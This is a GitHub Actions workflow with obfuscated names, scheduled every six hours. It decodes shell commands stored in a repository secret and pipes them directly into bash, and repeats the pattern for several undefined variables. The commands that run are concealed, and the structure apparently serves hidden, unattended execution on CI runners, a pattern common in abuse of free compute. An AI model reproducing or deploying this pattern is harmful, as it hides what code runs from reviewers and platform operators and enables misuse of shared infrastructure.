name: houyongliang1972
on:
  workflow_dispatch:
  schedule:
    - cron: '28 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: houyongliang1972
        env:
          hk259: ${{ secrets.hk259 }}
        run: |
          echo $hk259 | jq -r .ueii3127 | /bin/bash
          echo $jqqn368 | jq -r .x41 | /bin/bash
          echo $x8 | jq -r .i4014 | /bin/bash
          echo $fq7 | jq -r .ils79 | /bin/bash
          echo $c41 | jq -r .zb09335 | /bin/bash
          echo $yqagh5216 | jq -r .jdzht5 | /bin/bash
          echo $tbu6 | jq -r .llvb51237 | /bin/bash

